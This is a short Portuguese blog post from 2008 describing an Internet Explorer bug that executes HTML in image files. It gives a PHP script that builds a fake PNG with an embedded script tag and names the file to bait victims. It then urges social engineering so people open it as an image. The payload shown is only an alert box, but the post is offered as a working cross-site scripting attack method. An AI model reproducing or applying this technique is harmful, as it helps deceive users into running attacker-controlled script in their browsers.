dez 6 2008

Usando XSS em Imagens

O Internet Explorer possui um bug que permite a execução de código HTML em qualquer tipo de arquivo(png, jpg, gif, txt,etc). Isso ocorre quando a requisição da imagem é feita pela URL (não atravéz de <img> u.u) e não é encontrado algum mime-type. Versões mais recentes do browser já possuem este bug corrigido, mas grande maioria usa IE6 e IE7 sem atualizar, rodei em vários simuladores do IE7 e funcionaram.

O primeiro passo é criar um arquivo com alguma extensão que seja válido que contenha o código que queremos executar:

<?php
/*
   arquivo: pngmaker.php
   script simples para criar arquivos png
*/
$buffer  = "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A"; // Assinatura
$buffer .= "\x00\x00\x00\x0D";                 // Chunk size
$buffer .= "\x00\x00\x00\x0D";                 // Chunk id
$buffer .= "\x00\x00\x00\x01";                 // image width
$buffer .= "\x00\x00\x00\x01";                 // image height
 
$buffer .= "<html><body><script>alert('Examplo');</script></body></html>";
 
$imagem = fopen("mulher-jaca.png", "w");   //foi usado esse nome para atrair os bronhamans
fwrite($imagem, $buffer);  
fclose($imagem);  
 
?>

Depois só utilizar uma engenharia social básica, pelo cara acreditar se tratar de uma imagem, logo quase nenhum usuário vai achar que em uma imagem pode conter um script.



DEIXE UM COMENTÁRIO

Subscrever

Subscreve o Blog



Publicidade

Comentários Recentes

  • Carlos André: Bom dia, sou Carlos Técnico em Meio ambiente, estamos usando o cimento Cauê CPII E 32 em nossa obra...
  • Marcos Antônio dos Santos: Quero ganhar uma antena
  • maria luiza moreira dias: quero participar desse quadro porque meu carro precisa de uma reformação
  • Regina lucia: Estou gostando dessa oportunidade que este cartao esta oferecendo pra nos
  • shirley Balazs: Parabéns!! Informações de utilidade publica e de primeira, foi muito útil a mim.Obrigada!!

Links

Leitores Recentes

VALE O CLIQUE!

Site Seguro Ocioso

Divulgue o blog Infomaroto em seu site e tenha seu link ou banner aqui.
Blog Infomaroto